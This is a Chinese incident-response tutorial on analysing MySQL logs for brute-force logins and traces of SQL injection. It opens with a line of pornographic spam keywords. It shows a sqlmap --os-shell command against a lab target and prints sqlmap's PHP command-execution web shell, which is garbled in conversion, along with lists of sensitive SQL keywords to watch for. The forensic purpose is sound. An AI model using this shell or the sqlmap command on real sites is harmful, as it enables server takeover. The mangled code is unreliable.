国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5)

這篇具有很好參考價(jià)值的文章主要介紹了應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

第5篇:MySQL日志分析

常見(jiàn)的數(shù)據(jù)庫(kù)攻擊包括弱口令、SQL注入、提升權(quán)限、竊取備份等。對(duì)數(shù)據(jù)庫(kù)日志進(jìn)行分析,可以發(fā)現(xiàn)攻擊行為,進(jìn)一步還原攻擊場(chǎng)景及追溯攻擊源。

0x01 Mysql日志分析

general query log能記錄成功連接和每次執(zhí)行的查詢,我們可以將它用作安全布防的一部分,為故障分析或黑客事件后的調(diào)查提供依據(jù)。

1、查看log配置信息
show variables like '%general%';
2、開(kāi)啟日志
SET GLOBAL general_log = 'On';
3、指定日志文件路徑
#SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

比如,當(dāng)我訪問(wèn) /test.php?id=1,此時(shí)我們得到這樣的日志:

190604 14:46:14       14 Connect    root@localhost on 
           14 Init DB    test
           14 Query    SELECT * FROM admin WHERE id = 1
           14 Quit  `

我們按列來(lái)解析一下:

第一列:Time,時(shí)間列,前面一個(gè)是日期,后面一個(gè)是小時(shí)和分鐘,有一些不顯示的原因是因?yàn)檫@些sql語(yǔ)句幾乎是同時(shí)執(zhí)行的,所以就不另外記錄時(shí)間了。
第二列:Id,就是show processlist出來(lái)的第一列的線程ID,對(duì)于長(zhǎng)連接和一些比較耗時(shí)的sql語(yǔ)句,你可以精確找出究竟是那一條那一個(gè)線程在運(yùn)行。
第三列:Command,操作類型,比如Connect就是連接數(shù)據(jù)庫(kù),Query就是查詢數(shù)據(jù)庫(kù)(增刪查改都顯示為查詢),可以特定過(guò)慮一些操作。
第四列:Argument,詳細(xì)信息,例如 Connect    root@localhost on 意思就是連接數(shù)據(jù)庫(kù),如此類推,接下面的連上數(shù)據(jù)庫(kù)之后,做了什么查詢的操作。

0x02 登錄成功/失敗

我們來(lái)做個(gè)簡(jiǎn)單的測(cè)試吧,使用我以前自己開(kāi)發(fā)的弱口令工具來(lái)掃一下,字典設(shè)置比較小,2個(gè)用戶,4個(gè)密碼,共8組。

應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5),應(yīng)急響應(yīng),筆記,網(wǎng)絡(luò)安全,web安全,服務(wù)器,數(shù)據(jù)庫(kù),應(yīng)急響應(yīng),mysql

MySQL中的log記錄是這樣子:

應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5),應(yīng)急響應(yīng),筆記,網(wǎng)絡(luò)安全,web安全,服務(wù)器,數(shù)據(jù)庫(kù),應(yīng)急響應(yīng),mysql

Time                 Id        Command         Argument

190601 22:03:20     98 Connect  root@192.168.204.1 on 
       98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
      103 Connect  mysql@192.168.204.1 on 
      103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      104 Connect  mysql@192.168.204.1 on 
      104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Connect  root@192.168.204.1 on 
      101 Connect  root@192.168.204.1 on 
      101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
       99 Connect  root@192.168.204.1 on 
       99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)
      105 Connect  mysql@192.168.204.1 on 
      105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Query  set autocommit=0
      102 Connect  mysql@192.168.204.1 on 
      102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
      100 Quit  `

你知道在這個(gè)口令猜解過(guò)程中,哪個(gè)是成功的嗎?

利用爆破工具,一個(gè)口令猜解成功的記錄是這樣子的:

190601 22:03:20     100 Connect  root@192.168.204.1 on 
     100 Query  set autocommit=0
     100 Quit

但是,如果你是用其他方式,可能會(huì)有一點(diǎn)點(diǎn)不一樣的哦。

Navicat for MySQL登錄:

190601 22:14:07    106 Connect  root@192.168.204.1 on 
             106 Query  SET NAMES utf8
             106 Query  SHOW VARIABLES LIKE 'lower_case_%'
             106 Query  SHOW VARIABLES LIKE 'profiling'
             106 Query  SHOW DATABASES

命令行登錄:

190601 22:17:25    111 Connect  root@localhost on 
             111 Query  select @@version_comment limit 1
190601 22:17:56    111 Quit

這個(gè)差別在于,不同的數(shù)據(jù)庫(kù)連接工具,它在連接數(shù)據(jù)庫(kù)初始化的過(guò)程中是不同的。通過(guò)這樣的差別,我們可以簡(jiǎn)單判斷出用戶是通過(guò)連接數(shù)據(jù)庫(kù)的方式。

另外,不管你是爆破工具、Navicat for MySQL、還是命令行,登錄失敗都是一樣的記錄。

登錄失敗的記錄:

102 Connect  mysql@192.168.204.1 on 
102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

利用shell命令進(jìn)行簡(jiǎn)單的分析:

#有哪些IP在爆破?
grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
     27 192.168.204.1

#爆破用戶名字典都有哪些?
grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr
     13 mysql
     12 root
      1 root
      1 mysql

在日志分析中,特別需要注意一些敏感的操作行為,比如刪表、備庫(kù),讀寫文件等。關(guān)鍵詞:drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。

敏感數(shù)據(jù)庫(kù)表:SELECT * from mysql.user、SELECT * from mysql.func

0x03 SQL注入入侵痕跡

在利用SQL注入漏洞的過(guò)程中,我們會(huì)嘗試?yán)胹qlmap的--os-shell參數(shù)取得shell,如操作不慎,可能留下一些sqlmap創(chuàng)建的臨時(shí)表和自定義函數(shù)。我們先來(lái)看一下sqlmap os-shell參數(shù)的用法以及原理:

1、構(gòu)造一個(gè)SQL注入點(diǎn),開(kāi)啟Burp監(jiān)聽(tīng)8080端口

sqlmap.py -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080

HTTP通訊過(guò)程如下:

應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5),應(yīng)急響應(yīng),筆記,網(wǎng)絡(luò)安全,web安全,服務(wù)器,數(shù)據(jù)庫(kù),應(yīng)急響應(yīng),mysql

創(chuàng)建了一個(gè)臨時(shí)文件tmpbwyov.php,通過(guò)訪問(wèn)這個(gè)木馬執(zhí)行系統(tǒng)命令,并返回到頁(yè)面展示。

tmpbwyov.php:

<?php c=c=c=_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);z=@iniget(′disablefunctions′);if(!empty(z=@ini_get('disable_functions');if(!empty(z=@ini?g??et(?′??disable?f??unctions?′??);if(!empty(z)){z=pregreplace(′/[,]+/′,′,′,z=preg_replace('/[, ]+/',',',z=preg?r??eplace(?′??/[,]+/?′??,?′??,?′??,z);z=explode(′,′,z=explode(',',z=explode(?′??,?′??,z);z=arraymap(′trim′,z=array_map('trim',z=array?m??ap(?′??trim?′??,z);}else{z=array();}c=c." 2>&1\n";function f(n){global z;returniscallable(z;return is_callable(z;returnis?c??allable(n)and!in_array(n,n,n,z);}if(f('system')){ob_start();system(c);c);c);w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){y=procopen(y=proc_open(y=proc?o??pen(c,array(array(pipe,r),array(pipe,w),array(pipe,w)),t);t);t);w=NULL;while(!feof(t[1])){w.=fread(t[1],512);}@proc_close(y);}elseif(f('shell_exec')){w=shellexec(w=shell_exec(w=shell?e??xec(c);}elseif(f('passthru')){ob_start();passthru(c);c);c);w=ob_get_contents();ob_end_clean();}elseif(f('popen')){x=popen(x=popen(x=popen(c,r);w=NULL;if(isresource(w=NULL;if(is_resource(w=NULL;if(is?r??esource(x)){while(!feof(x)){w.=fread(x,512);}}@pclose(x);}elseif(f('exec')){w=array();exec(w=array();exec(w=array();exec(c,w);w);w);w=join(chr(10),w).chr(10);}else{w=0;}print "<pre>".$w."</pre>";?>`

創(chuàng)建了一個(gè)臨時(shí)表sqlmapoutput,調(diào)用存儲(chǔ)過(guò)程執(zhí)行系統(tǒng)命令將數(shù)據(jù)寫入臨時(shí)表,然后取臨時(shí)表中的數(shù)據(jù)展示到前端。

通過(guò)查看網(wǎng)站目錄中最近新建的可疑文件,可以判斷是否發(fā)生過(guò)sql注入漏洞攻擊事件。

檢查方法:

1、檢查網(wǎng)站目錄下,是否存在一些木馬文件:

應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5),應(yīng)急響應(yīng),筆記,網(wǎng)絡(luò)安全,web安全,服務(wù)器,數(shù)據(jù)庫(kù),應(yīng)急響應(yīng),mysql

2、檢查是否有UDF提權(quán)、MOF提權(quán)痕跡

檢查目錄是否有異常文件

mysql\lib\plugin

c:/windows/system32/wbem/mof/

檢查函數(shù)是否刪除

select * from mysql.func

3、結(jié)合web日志分析。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-831665.html

到了這里,關(guān)于應(yīng)急響應(yīng)實(shí)戰(zhàn)筆記02日志分析篇(5)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)預(yù)案培訓(xùn)

    應(yīng)急響應(yīng)預(yù)案的培訓(xùn)是為了更好地應(yīng)對(duì)網(wǎng)絡(luò)突發(fā)狀況,實(shí)施演 練計(jì)劃所做的每一項(xiàng)工作,其培訓(xùn)過(guò)程主要針對(duì)應(yīng)急預(yù)案涉及的相 關(guān)內(nèi)容進(jìn)行培訓(xùn)學(xué)習(xí)。做好應(yīng)急預(yù)案的培訓(xùn)工作能使各級(jí)人員明確 自身職責(zé),是做好應(yīng)急響應(yīng)工作的基礎(chǔ)與前提。應(yīng)急響應(yīng)預(yù)案的培 訓(xùn)分為以下幾

    2024年02月11日
    瀏覽(34)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)預(yù)案演練

    制定好的應(yīng)急響應(yīng)預(yù)案,只做培訓(xùn)還不夠,還需要通過(guò)實(shí)戰(zhàn)演 練來(lái)提高應(yīng)對(duì)網(wǎng)絡(luò)突發(fā)事件的行動(dòng)力,針對(duì)網(wǎng)絡(luò)突發(fā)事件的假想情 景,按照應(yīng)急響應(yīng)預(yù)案中規(guī)定的職責(zé)和程序來(lái)執(zhí)行應(yīng)急響應(yīng)任務(wù)。 根據(jù)出現(xiàn)的新的網(wǎng)絡(luò)攻擊手段或其他特殊情況,不斷進(jìn)行預(yù)案的調(diào) 整完善。 1、

    2024年02月10日
    瀏覽(20)
  • 網(wǎng)絡(luò)安全運(yùn)維-應(yīng)急響應(yīng)篇

    1.1 /tmp 目錄 此目錄下,任可用戶均可讀寫,因此應(yīng)關(guān)注此目錄內(nèi)容 1.2.1 /etc/init.d 系統(tǒng)服務(wù)目錄 /etc/init.d/apache2 status #查看服務(wù)狀態(tài) apache2.service - The Apache HTTP Server ???? Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled) ???? Active: inactive (dead) ?????? Doc

    2024年02月09日
    瀏覽(21)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)流程圖

    網(wǎng)絡(luò)安全應(yīng)急響應(yīng)流程圖

    當(dāng)前,許多地區(qū)和單位已經(jīng)初步建立了網(wǎng)絡(luò)安全預(yù)警機(jī)制,實(shí)現(xiàn)了對(duì)一般網(wǎng)絡(luò)安全事件的預(yù)警和處置。但是,由于網(wǎng)絡(luò)與信息安全技術(shù)起步相對(duì)較晚,發(fā)展時(shí)間較短,與其他行業(yè)領(lǐng)域相比,其專項(xiàng)應(yīng)急預(yù)案、應(yīng)急保障機(jī)制和相關(guān)的技術(shù)支撐平臺(tái)都還在不斷發(fā)展中。各政府機(jī)構(gòu)

    2024年02月05日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全之勒索病毒應(yīng)急響應(yīng)方案

    處置方法: 當(dāng)確認(rèn)服務(wù)器已經(jīng)被感染勒索病毒后,應(yīng)立即隔離被感染主機(jī),隔離主要包括物理隔離和訪問(wèn)控制兩種手段,物理隔離主要為斷網(wǎng)或斷電;訪問(wèn)控制主要是指對(duì)訪問(wèn)網(wǎng)絡(luò)資源的權(quán)限進(jìn)行嚴(yán)格的認(rèn)證和控制。 1. 物理隔離 物理隔離常用的操作方法是斷網(wǎng)和關(guān)機(jī)。 斷網(wǎng)

    2024年02月06日
    瀏覽(28)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)典型案例集

    網(wǎng)絡(luò)安全應(yīng)急響應(yīng)典型案例集

    本文是學(xué)習(xí)網(wǎng)絡(luò)安全應(yīng)急響應(yīng)典型案例集(2021). 而整理的學(xué)習(xí)筆記,分享出來(lái)希望更多人受益,如果存在侵權(quán)請(qǐng)及時(shí)聯(lián)系我們 數(shù)據(jù)泄露指將機(jī)密信息、私人信息或其他敏感信息發(fā)布到不安全的環(huán)境中。數(shù)據(jù)泄露分為外部泄露和內(nèi)部泄露兩種,外部泄露典型如攻擊者通過(guò)漏洞利

    2024年02月15日
    瀏覽(25)
  • 2023年網(wǎng)絡(luò)安全競(jìng)賽——網(wǎng)絡(luò)安全應(yīng)急響應(yīng)Server2228

    2023年網(wǎng)絡(luò)安全競(jìng)賽——網(wǎng)絡(luò)安全應(yīng)急響應(yīng)Server2228

    網(wǎng)絡(luò)安全應(yīng)急響應(yīng) 任務(wù)環(huán)境說(shuō)明: ü 服務(wù)器場(chǎng)景:Server2228(開(kāi)放鏈接) ü 用戶名:root,密碼:p@ssw0rd123 1. 找出被黑客修改的系統(tǒng)別名,并將倒數(shù)第二個(gè)別名作為Flag值提交; 使用用戶名和密碼登錄系統(tǒng),如下圖 在 Linux 中,可以使用 “alias” 命令查看當(dāng)前系統(tǒng)中定義的所有

    2024年02月10日
    瀏覽(24)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)預(yù)案培訓(xùn)與演練目的

    1、增強(qiáng)網(wǎng)絡(luò)安全意識(shí) 網(wǎng)絡(luò)安全事故隱患往往“生成”于無(wú)形。例如,漏洞或黑客攻 擊發(fā)生之時(shí),受害方企事業(yè)單位可能處于非常危險(xiǎn)的境地而無(wú)所察 覺(jué),一些內(nèi)部部門人員的網(wǎng)絡(luò)安全意識(shí)也容易懈怠。但不論是內(nèi)部 員工的疏忽還是管理上的大意,都可能給身在“暗處”的

    2024年02月11日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】3.3 應(yīng)急響應(yīng)和事后處理

    【網(wǎng)絡(luò)安全】3.3 應(yīng)急響應(yīng)和事后處理

    當(dāng)我們談?wù)摼W(wǎng)絡(luò)安全時(shí),我們會(huì)遇到各種各樣的威脅,如病毒、蠕蟲、木馬、DDoS攻擊等。面對(duì)這些威脅,我們需要進(jìn)行應(yīng)急響應(yīng),以最小化損失并保護(hù)我們的網(wǎng)絡(luò)。接下來(lái),我們將詳細(xì)講解應(yīng)急響應(yīng)的步驟,并提供一些實(shí)例來(lái)幫助你理解。 應(yīng)急響應(yīng)通常包括以下五個(gè)步驟:

    2024年02月08日
    瀏覽(21)
  • 網(wǎng)絡(luò)安全從入門到精通(特別篇I):Windows安全事件應(yīng)急響應(yīng)之Windows應(yīng)急響應(yīng)基礎(chǔ)必備技能

    事件發(fā)生時(shí)的狀況或安全設(shè)備告警等,能幫助應(yīng)急處置人員快速分析確定事件類型,方便前期準(zhǔn)備。 入侵肯定會(huì)留下痕跡,另外重點(diǎn)強(qiáng)調(diào)的是不要一上來(lái)就各種查查查,問(wèn)清楚誰(shuí)在什么時(shí)間發(fā)現(xiàn)的主機(jī)異常情況,異常的現(xiàn)象是什么,受害用戶做了什么樣的緊急處理。問(wèn)清楚主

    2024年04月15日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包